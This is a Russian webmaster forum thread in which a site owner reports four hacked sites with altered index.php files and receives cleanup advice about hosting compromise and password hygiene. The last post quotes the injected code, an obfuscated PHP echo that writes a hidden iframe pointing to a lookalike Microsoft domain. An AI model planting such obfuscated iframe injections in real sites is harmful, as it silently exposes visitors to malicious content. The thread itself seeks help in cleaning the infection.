- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Переиграть и победить: как анализировать конкурентов для продвижения сайта
С помощью Ahrefs
Александр Шестаков
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
У меня возникла такая ситуация. Сегодня 4 сайта, хостятся в одном месте, сдохли. У всех были ошибки в файлах index.php, Проблему я устранил простым копированием файлов из бэкапа. Но возникает вопрос - каким образом, из-за чего произошли изменения в этих файлах.
Ошибки? Без взгляда на сами сайты сказать сложно, но, может, просто взломали хостинг и прописали в код что-то? Это часто бывает - типа недлинную такую строчку с i-frame... или что другое аналогичное...
Если так, то стандартные процедуры: 1)убедиться, что работаешь с чистой машины, 2)вычистить/восстановить, 3)ликвидировать возможные способы повторного взлома (пароли сменить, дыру в цмс заделать...)
Пароли меняю раз в неделю (генератор паролей, пароли 9-12 значные). Машина чистая - проверил всем чем можно. Движки - 2 сайта на WordPress, один на ShopScript и один на самописном движке.
Насчет "всем чем можно" - иногда думаешь, что чистая машина, а на самом деле... Я так однажды никак не мог понять - у меня все чисто, проверялся пандой и онлайн сканерами, а на сайте точно вирус, клиенты скриншоты распечатывают...
В моем том случае были виноваты файлы старой цмски, которую я не полностью удалил, устанавливая свою.
Но, если цмски разные, то дело скорее всего не в них. Все же, думаю, либо у вас на компе дыре, либо у хостера. Такое тоже было. Взламывают соседей, а другим сайтам достается.
Так что еще раз попробовать себя проверить, пообщаться с хостерами и, может, сменить их.
PS. Так, совсем к слову - смысла от генерированных паролей не будет, если вбивать их руками (килоггер спалит) или хранить в фтп-клиенте (трояны таскают). Лучшее имхо решение - один раз сохранить в текстовом файле и оттуда copy-paste при подключении к серверу.
Спасибо за совет, а фтп-менеджер может быть причиной?
lsasha добавил 05.07.2009 в 14:08
Добавляется вот такая строчка:
<?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>'; ?>